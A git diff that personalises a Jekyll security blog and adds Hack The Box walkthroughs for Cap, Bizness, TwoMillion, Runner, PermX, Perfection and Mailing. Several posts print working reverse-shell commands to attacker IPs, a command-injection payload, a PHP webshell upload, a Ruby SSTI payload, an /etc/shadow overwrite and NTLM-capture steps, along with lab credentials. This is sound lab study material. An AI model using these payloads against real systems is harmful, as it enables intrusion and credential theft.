diff --git a/_config.yml b/_config.yml
index c99b42f..5dcc94d 100644
--- a/_config.yml
+++ b/_config.yml
@@ -9,37 +9,37 @@ theme: jekyll-theme-chirpy
lang: en
# Change to your timezone › https://kevinnovak.github.io/Time-Zone-Picker
-timezone:
+timezone: America/Monterrey
# jekyll-seo-tag settings › https://github.com/jekyll/jekyll-seo-tag/blob/master/docs/usage.md
# ↓ --------------------------
-title: Chirpy # the main title
+title: RaCc0x # the main title
-tagline: A text-focused Jekyll theme # it will display as the subtitle
+tagline: A blog about security, CTF writeups, Pro Labs, researches and more | Prepare for ECPPT, CPTS & OSCP certified
description: >- # used by seo meta and the atom feed
- A minimal, responsive and feature-rich Jekyll theme for technical writing.
+ A blog about security, CTF writeups, Pro Labs, researches and more.
# Fill in the protocol & hostname for your site.
# E.g. 'https://username.github.io', note that it does not end with a '/'.
-url: ""
+url: "https://racc0x.github.io"
github:
- username: github_username # change to your GitHub username
+ username: racc0x # change to your github username
twitter:
- username: twitter_username # change to your Twitter username
+ username: dreii042 # change to your twitter username
social:
# Change to your full name.
# It will be displayed as the default author of the posts and the copyright owner in the Footer
- name: your_full_name
- email: example@domain.com # change to your email address
+ name: racc0x
+ email: racc0xyz@gmail.com # change to your email address
links:
# The first element serves as the copyright owner's link
- - https://twitter.com/username # change to your Twitter homepage
- - https://github.com/username # change to your GitHub homepage
+ - https://twitter.com/dreii042 # change to your twitter homepage
+ - https://github.com/racc0x # change to your github homepage
# Uncomment below to add more social links
# - https://www.facebook.com/username
# - https://www.linkedin.com/in/username
@@ -98,7 +98,7 @@ theme_mode: # [light | dark]
cdn:
# the avatar on sidebar, support local or CORS resources
-avatar:
+avatar: "/assets/img/inspectorardilla.jpg"
# The URL of the site-wide social preview image used in SEO `og:image` meta tag.
# It can be overridden by a customized `page.image` in front matter.
diff --git a/_posts/2021-05-06-cap.md b/_posts/2021-05-06-cap.md
new file mode 100644
index 0000000..a1b1eaf
--- /dev/null
+++ b/_posts/2021-05-06-cap.md
@@ -0,0 +1,135 @@
+---
+title: HTB - Cap
+date: 2021-05-06 00:00:00 +8000
+categories: [hackthebox ]
+tags: [HackTheBox, Information Disclosure, CVE-2021-4034, tcpdump]
+image:
+ path: /assets/img/post/cap/Cap.png
+ lqip: data:image/webp;base64,UklGRpoAAABXRUJQVlA4WAoAAAAQAAAADwAABwAAQUxQSDIAAAARL0AmbZurmr57yyIiqE8oiG0bejIYEQTgqiDA9vqnsUSI6H+oAERp2HZ65qP/VIAWAFZQOCBCAAAA8AEAnQEqEAAIAAVAfCWkAALp8sF8rgRgAP7o9FDvMCkMde9PK7euH5M1m6VWoDXf2FkP3BqV0ZYbO6NA/VFIAAAA
+ alt: Hack the Box - Cap.
+---
+
+## Box Info
+
+| Name | Cap |
+| :-------------------- | ---------------: |
+| Release Date | 5 Jun, 2024 |
+| OS | Linux |
+| Rated Difficulty | Easy |
+
+
+## Ping
+
+```bash
+ping -c 3 10.10.10.245
+
+PING 10.10.10.245 (10.10.10.245) 56(84) bytes of data.
+64 bytes from 10.10.10.245: icmp_seq=1 ttl=63 time=55.6 ms
+64 bytes from 10.10.10.245: icmp_seq=2 ttl=63 time=55.9 ms
+64 bytes from 10.10.10.245: icmp_seq=3 ttl=63 time=54.8 ms
+```
+
+`ttl=63 -> Linux System`
+
+## Nmap
+
+```bash
+nmap -p- --open --min-rate 5000 -n -sS -vvv -Pn 10.10.10.245
+```
+
+```bash
+PORT STATE SERVICE VERSION
+21/tcp open ftp vsftpd 3.0.3
+22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey:
+| 3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
+| 256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
+|_ 256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
+80/tcp open http gunicorn
+| fingerprint-strings:
+| FourOhFourRequest:
+| HTTP/1.0 404 NOT FOUND
+| Server: gunicorn
+| Date: Sat, 22 May 2021 10:51:48 GMT
+| Connection: close
+| Content-Type: text/html; charset=utf-8
+| Content-Length: 232
+|
+| 404 Not Found
+|
Not Found
+|
The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.
+| GetRequest:
+| HTTP/1.0 200 OK
+| Server: gunicorn
+| Date: Sat, 22 May 2021 10:51:42 GMT
+| Connection: close
+| Content-Type: text/html; charset=utf-8
+| Content-Length: 19386
+|
+|
+|
+...[snip]...
+SF:eck\x20your\x20spelling\x20and\x20try\x20again\.\n");
+Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
+```
+
+
+
+data/1
+
+
+
+I starter with a scan directoriy but dont foudn anything interesting
+
+
+
+## Information Disclosure
+
+```bash
+ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u 'http://10.10.10.245/data/FUZZ' -fs 208
+```
+
+
+
+I download those and i test one by one to found sensitive data
+
+
+
+```bash
+tcpdump -qns 0 -X -r 0.pcap
+```
+
+**User:**
+
+
+
+**Password:**
+
+
+
+`nathan`
+
+`Buck3tH4TF0RM3!`
+
+
+**Login with ssh**
+
+
+
+## Escalation Privilege | CVE-2021-4034
+
+```BASH
+find / -perm -4000 2>/dev/null
+```
+
+
+
+We found a bin interesting called pkexec. Looking if the pkexec has a vulnerability, i find a CVE-2021-4034
+
+https://github.com/ly4k/PwnKit
+
+We upload the file PwnKit and exploit as nathan and BOOM!
+
+
+
+Pwned!!
\ No newline at end of file
diff --git a/_posts/2024-01-01-bizness.md b/_posts/2024-01-01-bizness.md
new file mode 100644
index 0000000..c88a61e
--- /dev/null
+++ b/_posts/2024-01-01-bizness.md
@@ -0,0 +1,94 @@
+---
+title: HTB - Bizness
+date: 2024-08-13 12:17:34 -0400
+categories: [hackthebox , Bizness]
+tags: [hackthebox, Apache, OFBiz,dirsearch,nmap,cracking,enumeration,hashcat,htb-bizness,ctf,CVE-2023-49070,linux]
+image:
+ path: /assets/img/post/bizness-card.png
+ lqip: data:image/webp;base64,UklGRpoAAABXRUJQVlA4WAoAAAAQAAAADwAABwAAQUxQSDIAAAARL0AmbZurmr57yyIiqE8oiG0bejIYEQTgqiDA9vqnsUSI6H+oAERp2HZ65qP/VIAWAFZQOCBCAAAA8AEAnQEqEAAIAAVAfCWkAALp8sF8rgRgAP7o9FDvMCkMde9PK7euH5M1m6VWoDXf2FkP3BqV0ZYbO6NA/VFIAAAA
+ alt: Hack the Box - Bizness.
+---
+
+## Box Info
+
+| Name | Bizness |
+| :-------------------- | ---------------: |
+| Release Date | 06 Jan, 2024 |
+| OS | Linux |
+| Rated Difficulty | Easy |
+
+## Enumeration
+
+```bash
+nmap -p- --min-rate 5000 -n -sS -vvv -Pn 10.10.11.252 -oG allports
+nmap -sCV -p 22,80,443,40117 10.10.11.252 -oN targeted
+```
+
+
+
+## Add the domain to /etc/hosts
+
+```bash
+echo "10.10.11.252 bizness.htb | sudo tee -a /etc/hosts/
+```
+
+
+## Brute Force Directory
+
+```bash
+dirsearch -u http://bizness.htb/
+```
+
+
+## OFBiz
+
+The website is using a technology called `OFBiz` with version `18.12`, the current version is out date.
+
+
+
+## Apache OFBiz 18.12 CVE-2023-49070
+
+
+
+[***Apache-OFBiz-Authentication-Bypass***](https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass)
+
+We used the exploit to authenticate ourselves.
+
+```bash
+python3 exploit.py --url https://bizness.htb:443 --cmd 'nc -e /bin/bash 10.10.14.16 7777'
+```
+
+```bash
+nc -lvnp 7777
+```
+
+
+
+## Enumeration linux
+
+Before launching this search, I found a location where the OFBiz folder was located and performed searches that contain admin.
+I searched recursively using grep, using options like -Rail, and to specify the word I used -e.
+
+```shell
+grep -Rail -e 'admin$' /top/ofbiz/runtime/data/derby/ofbiz/seg0
+```
+
+
+
+We came across a lot of data, so we have to go through each one by one.
+
+We find a user and the hash
+
+
+
+## Cracking Hash
+
+We will use the Go hash matcher script to crack the password.
+
+[**Go-Hash-Matcher**](https://github.com/IamLucif3r/Go-Hash-Matcher?source=post_page-----68713a41f98b--------------------------------)
+
+
+
+Once we have the password, we log in at the `root`
+
+
\ No newline at end of file
diff --git a/_posts/2024-01-03-twomillion.md b/_posts/2024-01-03-twomillion.md
new file mode 100644
index 0000000..a1734b9
--- /dev/null
+++ b/_posts/2024-01-03-twomillion.md
@@ -0,0 +1,214 @@
+---
+title: HTB - TwoMillion
+date: 2023-06-07 12:17:34 -0400
+categories: [hackthebox , TwoMillion]
+tags: [HackTheBox, API endpoints, API, CVE-2023-0386, nmap, web, rot13, curl,OverlaysFS Fuse]
+image:
+ path: /assets/img/post/twomillion/twomillion-card.png
+ lqip: data:image/webp;base64,UklGRpoAAABXRUJQVlA4WAoAAAAQAAAADwAABwAAQUxQSDIAAAARL0AmbZurmr57yyIiqE8oiG0bejIYEQTgqiDA9vqnsUSI6H+oAERp2HZ65qP/VIAWAFZQOCBCAAAA8AEAnQEqEAAIAAVAfCWkAALp8sF8rgRgAP7o9FDvMCkMde9PK7euH5M1m6VWoDXf2FkP3BqV0ZYbO6NA/VFIAAAA
+ alt: Hack the Box - TwoMillion.
+---
+
+## Box Info
+
+| Name | Bizness |
+| :-------------------- | ---------------: |
+| Release Date | 07 Jun, 2023 |
+| OS | Linux |
+| Rated Difficulty | Easy |
+
+## Enumeration
+
+### Nmap
+
+```bash
+nmap -p- --min-rate 5000 -n -sS -vvv -Pn 10.10.11.221 -oG allPorts
+nmap -sCV -p 22,80 10.10.11.221 -oN targeted
+```
+
+
+
+### Resolution DNS
+
+```bash
+echo "10.10.11.221 twomillion.htb | sudo tee -a /etc/hosts"
+```
+
+
+
+## Web
+
+When hover the mouse over "`here`" show it us the link to goes.
+
+
+
+Looking in dom i found this path from a API and the instruction of how script works
+
+
+
+
+
+Url decode for read more comfort:
+
+```js
+function verifyInviteCode(code){
+var formData = {"code":code};
+$.ajax({
+type: "POST",
+url: '/api/v1/invite/verify',
+dataType: 'json',
+data: formData,
+success: function(response){
+console.log(response);
+},
+error: function(response){
+console.log(response);
+}
+});
+}
+
+function makeInviteCode(){
+$.ajax({
+type: "POST",
+url: '/api/v1/invite/how/to/generate',
+dataType: 'json',
+success: function(response){
+console.log(response);
+},
+error: function(response){
+console.log(response);
+}
+});
+}
+```
+
+Theres a interesting function called makeInviteCode so we gonna execute this function on console from inspection web.
+
+
+
+If i click in the object it show us something interesting encrypte in `ROT13`
+
+
+
+We can decrypt rot13 with some web page for that
+
+
+
+`"In order to generate the invite code, make a POST request to /api/invite/generate"`
+
+```bash
+curl -s -X POST "http://2million.htb/api/v1/invite/generate"
+```
+
+With `curl` can send a POST method for generate the invite code.
+
+
+
+And the API it generate us an code in base64, it can decrypt with base64[^code] and use it for registration us web and login.
+
+
+
+
+
+Looking in the web, I found a path in api/v1
+
+
+
+## API
+
+Abusing again the API we send a request in method GET with the Cookie
+
+```bash
+`curl -s -X GET "http://2million.htb/api/v1" -H "Cookie: PHPSESSID=avhllptt4vvs1rbocvart3ue9b"`
+```
+
+
+
+```bash
+curl -s -X PUT "http://2million.htb/api/v1/admin/settings/update" -H "Cookie: PHPSESSID=" -H "Content-Type: application/json" | jq
+```
+
+
+
+```bash
+curl -s -X PUT "http://2million.htb/api/v1/admin/settings/update" -H "Cookie: PHPSESSID=" -H "Content-Type: application/json" -d '{"email": "jack@jack.com"}' | jq
+```
+
+
+
+```bash
+curl -s -X PUT "http://2million.htb/api/v1/admin/settings/update" -H "Cookie: PHPSESSID=" -H "Content-Type: application/json" -d '{"email": "jack@jack.com", "is:admin": "True"}' | jq
+```
+
+
+
+```bash
+curl -s -X PUT "http://2million.htb/api/v1/admin/settings/update" -H "Cookie: PHPSESSID=" -H "Content-Type: application/json" -d '{"email": "jack@jack.com", "is:admin": "1"}' | jq
+```
+
+
+
+```bash
+curl -s -X GET "http://2million.htb/api/v1/admin/auth" -H "Cookie: PHPSESSID="
+```
+
+
+
+```bash
+curl -s -X POST "http://2million.htb/api/v1/admin/vpn/generate" -H "Cookie: PHPSESSID=" -H "Content-Type: application/json' -d '{"username": "jack"}' | jq
+```
+
+
+
+
+
+```bash
+curl -s -X POST "http://2million.htb/api/v1/admin/vpn/generate" -H "Cookie: PHPSESSID=" -H "Content-Type: application/json' -d '{"username": ";whoami;"}'
+```
+
+
+
+```bash
+curl -s -X POST "http://2million.htb/api/v1/admin/vpn/generate" -H "Cookie: PHPSESSID=" -H "Content-Type: application/json' -d '{"username": ";ls;"}'
+```
+
+
+
+```bash
+curl -s -X POST "http://2million.htb/api/v1/admin/vpn/generate" -H "Cookie: PHPSESSID=" -H "Content-Type: application/json' -d '{"username": ";bash -c \"bash -i >& /dev/tcp/10.10.14.88/443 0>&1\" #"}'
+```
+
+
+
+```bash
+rlwrap nc -lvnp 443
+```
+
+
+
+Enumerate linux we can see a folder with the name .env this contain a credentials in plane text. We are a www-data so we need
+
+
+
+admin SuperDuperPass123
+
+When we login the first appear is mail, this mail is lcoated in /var/mail
+
+
+
+## CVE-2023-0386
+
+Well, the mail says everything... Google it.
+
+
+
+Search in google "OverlaysFS Fuse linux kernel and the fisrt poc i found is this `CVE-2023-0386`[^cve]
+
+
+
+ROOT
+
+### Source
+
+[^code]:
+[^cve]:
\ No newline at end of file
diff --git a/_posts/2024-01-04-runner.md b/_posts/2024-01-04-runner.md
new file mode 100644
index 0000000..cb4f27e
--- /dev/null
+++ b/_posts/2024-01-04-runner.md
@@ -0,0 +1,157 @@
+---
+title: HTB - Runner
+date: 2023-06-07 12:17:34 -0400
+categories: [hackthebox , Runner]
+tags: [HackTheBox, Port Forwarding, wfuzz, TeamCity, ssh, john, chisel, portainer, docker,fuzz]
+image:
+ path: /assets/img/post/runner/runner-card.png
+ lqip: data:image/webp;base64,UklGRpoAAABXRUJQVlA4WAoAAAAQAAAADwAABwAAQUxQSDIAAAARL0AmbZurmr57yyIiqE8oiG0bejIYEQTgqiDA9vqnsUSI6H+oAERp2HZ65qP/VIAWAFZQOCBCAAAA8AEAnQEqEAAIAAVAfCWkAALp8sF8rgRgAP7o9FDvMCkMde9PK7euH5M1m6VWoDXf2FkP3BqV0ZYbO6NA/VFIAAAA
+ alt: Hack the Box - Runner.
+---
+
+## Box Info
+
+| Name | Bizness |
+| :-------------------- | ---------------: |
+| Release Date | 08 Jun, 2024 |
+| OS | Linux |
+| Rated Difficulty | Medium |
+
+## Enumeration
+
+### Nmap
+
+
+
+### Resolution DNS
+
+```bash
+echo "10.10.11.13 runner.htb | sudo tee -a /etc/hosts
+```
+
+### Scanning SubDomain
+
+```bash
+wfuzz -c -w /usr/share/wordlists/amass/shubs-subdomains.txt --hc 400,404,403,302 -H "Hosts: FUZZ.runner.htb" -u http://runner.htb -t 100
+```
+
+
+
+```bash
+Whatweb http://runner.htb
+```
+## CVE-2023-42793 for Jet Brains
+
+We can see the version of `TeamCity build management server`.
+
+
+
+Googling `Teamcity 2023.05.3` exploit i found a `RCE` vulnerability for it.
+
+
+
+PoC[^poc]:
+
+```bash
+python3 exploit.py -u http://teamcity.runner.htb -n test2 -p test122 -e test2@test.com
+```
+
+
+
+The script exploits to create an admin account on a TeamCity server. It sends a POST request to the target URL to create an admin user with specified or random credentials.
+
+
+
+## SSH
+
+Once inside, I enumerate these sections and found in Diagnostics make a backup and storage in a zip file and can we display the folders and found id_rsa.
+
+
+
+We go to download and save for login with ssh.
+
+
+
+Wait.. but dont have a user for login with ssh...
+
+
+
+We also found users and there hashes in same folder.
+
+
+
+## Crack Hash
+
+We go to crack the password for it.
+
+
+
+```bash
+john --wordlist=/usr/share/wordlists/rockyou.txt --format=bcrypt hash.txt
+```
+Using default input encoding: UTF-8 Loaded 2 password hashes with 2 different salts (bcrypt [Blowfish 32/64 X3]) Remaining 1 password hash Cost 1 (iteration count) is 128 for all loaded hashes Will run 2 OpenMP threads
+
+Password: `piper123`
+
+Till now we have one id_rsa file, two users (Methew, jhon),password for Methew.
+
+`ssh -i id_rsa john@10.10.11.13`
+
+
+
+
+
+## Port Forwarding
+
+```bash
+netstat -nltp
+ss -nltpu
+```
+
+127.0.0.1:9000 its potential, I’ll be employing Chisel for port forwarding.
+
+
+
+```bash
+chisel server -p 6150 --reverse (Attack Machine)
+./chisel client 10.10.14.68:6150 R:9000:127.0.0.1:9000 (Victim machine)
+```
+
+
+
+We go to our port 9000
+
+
+
+## Docker
+
+Login with credentials `matthew` - `piper123`
+
+
+
+
+
+## CVE-2024-21626 for Docker
+
+
+
+the path `/proc/self/id/8` is from the [CVE-2024-21626](https://nitroc.org/en/posts/cve-2024-21626-illustrated/#how-docker-engine-calls-runc) - [PoC - GitHub](https://github.com/NitroCao/CVE-2024-21626?tab=readme-ov-file)
+
+
+
+Now we go to console
+
+
+
+Execute a `/bin/bash` as root
+
+
+
+Just login as root and look the folder `root` for the flag
+
+
+
+Root
+
+#### Source
+[^poc]:
\ No newline at end of file
diff --git a/_posts/2024-01-05-permx.md b/_posts/2024-01-05-permx.md
new file mode 100644
index 0000000..7c36158
--- /dev/null
+++ b/_posts/2024-01-05-permx.md
@@ -0,0 +1,167 @@
+---
+title: HTB - PermX
+date: 2023-06-07 12:17:34 -0400
+categories: [hackthebox , PermX]
+tags: [HackTheBox,Chamilo LMS,CVE-2023-4220,mysql,symlink,curl ]
+image:
+ path: /assets/img/post/permx/PermX.png
+ lqip: data:image/webp;base64,UklGRpoAAABXRUJQVlA4WAoAAAAQAAAADwAABwAAQUxQSDIAAAARL0AmbZurmr57yyIiqE8oiG0bejIYEQTgqiDA9vqnsUSI6H+oAERp2HZ65qP/VIAWAFZQOCBCAAAA8AEAnQEqEAAIAAVAfCWkAALp8sF8rgRgAP7o9FDvMCkMde9PK7euH5M1m6VWoDXf2FkP3BqV0ZYbO6NA/VFIAAAA
+ alt: Hack the Box - PermX.
+---
+
+## Box Info
+
+| Name | Bizness |
+| :-------------------- | ---------------: |
+| Release Date | 20 Jun, 2024 |
+| OS | Linux |
+| Rated Difficulty | Easy |
+
+## Enumeration
+
+### Nmap
+
+
+
+#### whatweb:
+
+
+
+#### Wappalyzer
+
+
+
+### Web
+
+
+
+#### Brute Forcing directory
+
+I use
+
+```bash
+dirsearch -u http://permx.htb/
+```
+
+ but i dont find anything interesting, So i use the Scan for Subdomain
+
+#### SubDomain
+
+```bash
+wfuzz -c -w /usr/share/wordlists/amass/subdomains-top1mil-5000.txt --hc 400,403,404,302 -H "Host: FUZZ.permx.htb" -u http://permx.htb -t 100
+```
+
+
+
+Search for chamilo in google.
+
+### Chamilo LMS - CVE-2023-4220
+
+
+
+RCE:
+```bash
+echo '& /dev/tcp/10.10.10.13/9001 0>&'"); ?>' > rce.php
+```
+
+```bash
+curl -F 'bigUploadFile=@rce.php' 'http:///main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
+`The file has successfully been uploaded.`
+```
+
+```bash
+curl 'http:///main/inc/lib/javascript/bigupload/files/rce.php'
+`uid=33(www-data) gid=33(www-data) groups=33(www-data)`
+```
+
+
+
+We go to open the file through web.
+
+
+
+Execute the file .php `http://lms.permx.htb//main/inc/lib/javascript/bigupload/files/rce.php` with `lvwrap nc -lvnp 7777` listening for get the reverse shell
+
+
+
+taadaaa... Well, we login as `www-data` and we go to enumerate...
+I found in config folder a file `configuration.php` and show it us a user and password.
+
+Till now we have one user:`chamilo` and password:`03f6lY3uXAP2...`.
+
+
+
+`netstat -nlp` or `netstat -ano` and we see one port strange and is port 3306 it is open for the database.
+
+
+
+Use the mysql inside in the victim machine.
+
+```bash
+mysql -uchamilo -p and the password 03F6lY3uXAP2bkW8
+```
+
+
+```text
+show databases;
+use chamilo;
+describe user;
+select user_id,username,firstname,lastname,password,salt from user;
+```
+
+
+
+We login with ssh `mtz@permx.htb` and password `03F6lY3uXAP2bkW8`
+
+
+
+`sudo -l`
+
+
+
+## Symlink (Symbolic Link Attack)
+
+The directory `/etc/init.d`{: .filepath} is home to **scripts** for System V init (SysVinit), the **classic Linux service management system**. It includes scripts to `start`, `stop`, `restart`, and sometimes `reload` services. These can be executed directly or through symbolic links found in `/etc/rc?.d/`{: .filepath}. An alternative path in Redhat systems is `/etc/rc.d/init.d`{: .filepath}.
+
+Its main function is to change all file permissions, but it must be in the `/home/mtz` directory.
+
+
+
+[Symlink Español](https://www.freecodecamp.org/espanol/news/tutorial-de-enlace-simbolico-en-linux-como-crear-y-remover-un-enlace-simbolico/)
+[Symlink Hacktricks](https://book.hacktricks.xyz/pentesting-web/file-upload#symlink)
+
+```bash
+link soft / to cc
+ln -s / cc
+```
+
+Create a folder that points to the root path with Symlink with the -s (soft) option to locate ourselves inside it and make changes to `/etc/shadow`{: .filepath} (root password) with a password that we create ourselves (cccc).
+
+
+
+The `/etc/shadow`{: .filepath} storage the password of root
+
+```bash
+sudo /opt/acl.sh mtz rwx /home/mtz/etc/shadow (execute the script for change the permissions)
+```
+
+
+
+Generated a password for remplace the root password in `/etc/shadow`{: .filepath}
+
+```bash
+openssl passwd -6 cccc
+```
+
+
+
+and copy and paste en the file `"shadow"`
+
+```bash
+echo 'root: {password generate}:19871:0:99999:7:::' > /home/mtz/cc/etc/shadow
+```
+Login as root with password cccc
+
+
+
+`Root`
\ No newline at end of file
diff --git a/_posts/2024-01-06-perfection.md b/_posts/2024-01-06-perfection.md
new file mode 100644
index 0000000..2c68f44
--- /dev/null
+++ b/_posts/2024-01-06-perfection.md
@@ -0,0 +1,131 @@
+---
+title: HTB - Perfection
+date: 2024-02-02 12:17:34 -0400
+categories: [hackthebox , Perfection]
+tags: [HackTheBox, SSTI, sudo, nmap, hashcat ]
+image:
+ path: /assets/img/post/perfection/Perfection.png
+ lqip: data:image/webp;base64,UklGRpoAAABXRUJQVlA4WAoAAAAQAAAADwAABwAAQUxQSDIAAAARL0AmbZurmr57yyIiqE8oiG0bejIYEQTgqiDA9vqnsUSI6H+oAERp2HZ65qP/VIAWAFZQOCBCAAAA8AEAnQEqEAAIAAVAfCWkAALp8sF8rgRgAP7o9FDvMCkMde9PK7euH5M1m6VWoDXf2FkP3BqV0ZYbO6NA/VFIAAAA
+ alt: Hack the Box - Perfection.
+---
+
+## Box Info
+
+| Name | Perfection |
+| :-------------------- | ---------------: |
+| Release Date | 02 Mar, 2024 |
+| OS | Linux |
+| Rated Difficulty | Easy |
+
+## Enumeration
+
+```bash
+nmap -p- --open --min-rate 5000 -n -sS -vvv -Pn 10.10.11.253 -oG allPorts
+nmap -sCV -p 22,80 10.10.11.253 -oN targeted
+```
+
+
+
+#### Resolution DNS
+
+```bash
+echo "10.10.11.253 perfection.htb" | sudo tee -a /etc/hosts
+```
+
+#### Technology
+
+```text
+whatweb http://perfection.htb
+```
+
+
+
+## Web
+
+
+
+The web is powered by WEBrick version 1.7.0, `WEBrick is a Ruby library providing simple HTTP web servers`{: filepath}
+
+
+
+Well, if you intercept the request u can see something like this `category1=literature` but if u try to this `category1=$` get a redirect with a text "Malicious text blocked".
+
+We can do with ffuf an scan for get a list of blocked characters.
+
+```bash
+ffuf -u http://10.10.11.253/weighted-grade-calc -d 'category1=FUZZ&grade1=90&weight1=30&category2=poop&grade2=100&weight2=50&category3=poop&grade3=100&weight3=20&category4=N%2FA&grade4=0&weight4=0&category5=N%2FA&grade5=0&weight5=0' -w /opt/SecLists/Fuzzing/alphanum-case-extra.txt -mr Malicious
+```
+
+But what happens if a url encode the input?
+
+```text
+category1= poop%0aFUZZ &grade1=90&weight1=30&category2=poop&grade2=100&weight2=50&category3=poop&grade3=100&weight3=20&category4=N%2FA&grade4=0&weight4=0&category5=N%2FA&grade5=0&weight5=0' -w /opt/SecLists/Fuzzing/alphanum-case-extra.txt -mr Malicious
+```
+
+`%0a`— represents a newline character, used to `bypass input validation`.
+
+The first thing I think is that there may be an SSTI.
+We go look to in payloadallthethings if there is something for ruby
+
+[PaylaodsAllTheThings-Ruby](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#ruby---basic-injections)
+
+
+
+`hURL` _to encode and decode payloads showcases the manipulation of data to exploit web application vulnerabilities. The payload crafted for the Weighted Grade Calculator application is designed to execute a reverse shell command, taking advantage of any potential server-side code execution vulnerabilities_
+
+```shell
+hURL -B "bash -i >& /dev/tcp/10.10.14.78/7777 0>&1" (base64)
+```
+
+```shell
+hURL -U "{_stringbase64_}" (URLencoded)
+```
+
+
+
+#### Payload
+```text
+category1=poop%0a<%25=system("echo+YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMC4xMC4xNC40OC83Nzc3IDA%2BJjE%3D|+base64+-d+|+bash");%25>1
+```
+
+
+
+Or use the payload `<%= IO.popen('id').readlines() %>` and urlencoded.
+
+
+
+[Hacktricks-SSTI](https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#erb-ruby)
+
+```bash
+<%= IO.popen('bash -i >& /dev/tcp/10.10.14.78/7777 0>&1').readlines() %>
+```
+
+
+
+Enumerating found the file .db and got the credentials.
+
+_A string is any sequence of 4 or more printable characters .db_
+
+
+
+## Privilege Escalation
+
+
+
+### Hashcat
+
+```bash
+hashcat -m 1400 hash.txt -a 3 "susan_nasus_?d?d?d?d?d?d?d?d"
+```
+
+
+
+
+
+```text
+susan_nasus_413759210
+```
+
+
+
+Root
\ No newline at end of file
diff --git a/_posts/2024-01-07-mailing.md b/_posts/2024-01-07-mailing.md
new file mode 100644
index 0000000..b083c82
--- /dev/null
+++ b/_posts/2024-01-07-mailing.md
@@ -0,0 +1,245 @@
+---
+title: HTB - Mailing
+date: 2024-02-02 12:17:34 -0400
+categories: [hackthebox , Mailing]
+tags: [HackTheBox, Impacket, wmiexec, NTLM, CVE-2024-21413, telnet, Evil-winrm, smb, more, nmap, hashcat, Dump Sam Hash, ]
+image:
+ path: /assets/img/post/mailing/Mailing-card.png
+ lqip: data:image/webp;base64,UklGRpoAAABXRUJQVlA4WAoAAAAQAAAADwAABwAAQUxQSDIAAAARL0AmbZurmr57yyIiqE8oiG0bejIYEQTgqiDA9vqnsUSI6H+oAERp2HZ65qP/VIAWAFZQOCBCAAAA8AEAnQEqEAAIAAVAfCWkAALp8sF8rgRgAP7o9FDvMCkMde9PK7euH5M1m6VWoDXf2FkP3BqV0ZYbO6NA/VFIAAAA
+ alt: Hack the Box - Mailing.
+---
+
+## Box Info
+
+| Name | Mailing |
+| :-------------------- | ---------------: |
+| Release Date | 02 Mar, 2024 |
+| OS | Windows |
+| Rated Difficulty | Easy |
+
+## **Enumeration**
+
+```bash
+nmap -p- --open --min-rate 5000 -sS -n -vvv -Pn 10.10.11.14 -oG allPorts
+```
+
+
+
+
+ExtractPorts
+
+```bash
+nmap -sCV -p 25,80,110,135,139,143,445,465,587,993,5040,5985,7680,47001... 10.10.11.14 -oN targeted
+ ```
+
+
+
+
+#### **Adding Domain to Hosts File**
+
+```bash
+echo "10.10.11.14 mailing.htb" | sudo tee -a /etc/hosts
+```
+
+
+
+
+
+## **Information Gathering**
+
+Below the website you can download a pdf file.
+
+
+
+the file download has this potential `LFI`
+
+
+
+### Directory Brute Forcing
+
+Dirsearch
+
+
+Or with curl -I can give you something interesting
+
+`curl -I
+
+
+
+## **Exploitation**
+
+Our first foothold is the **LFI** found. We go to intercept the request and see what we can do.
+
+`/download.php?file=../../windows/system32/drivers/etc/hosts`{: filepath}
+
+
+
+We will try to point to the hosts file to confirm if we are against an LFI.
+
+After exploring the folder structure of hMailServer and asking ChatGPT what should be inside, I found the `hMailServer.INI` file in the `bin` folder and `hmailserver_awstats.log` in the `logs` folder. [Structure folder from hMailServer](https://www.hmailserver.com/documentation/v4.4/?page=folderstructure)
+
+I accessed the logs to determine which emails I can access.
+
+
+In the `hMailServer.INI` file, I found the passwords for the admin and the database
+
+
+
+Using a hash identifier to determine the type of hash before attempting to crack it
+
+
+
+We can use [crackstation](https://crackstation.net/) for crack it or use `hashcat` as alternative
+
+
+
+`echo "841bb5acfa6779ae432fd7a4e6600ba7" >> hash2.txt`
+
+```bash
+hashcat -m 0 -a 0 -o cracked.txt hash2.txt /usr/share/wordlists/rockyou.txt
+```
+
+- `m 0` sets the mode to MD5.
+- `a 0` specifies a dictionary attack.
+
+
+
+841bb5acfa6779ae432fd7a4e6600ba7:`homenetworkingadministrator`
+
+## **Telnet**
+
+I'm using Telnet to verify if I can access the mail using this password.
+
+
+
+
+
+But we cant do anything, there is no exploitable email in the mailbox, but now that I have the credentials of the mail server, I thought that I could obtain NTLM by forcing access to the responder.
+
+`NTLM Hash (Windows Challenge/Response) is the cryptographic format in which user passwords are stored on Windows systems.`
+
+[**¿How works the NTLM Authentication?**](https://www.ionos.mx/digitalguide/servidores/know-how/ntlm/)
+
+After investigating some CVEs, I found one that allows me to send an email to the Maya user found in the log, for to capture an NTLM password.
+
+## CVE-2024-21413
+
+`sudo responder -I tun0`
+
+```bash
+python3 CVE-2024-21413.py --server mailing.htb --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender administrator@mailing.htb --recipient maya@mailing.htb --url '\\10.10.16.20\mailing' --subject HI
+```
+
+
+
+
+
+`Hash from user maya`
+
+```text
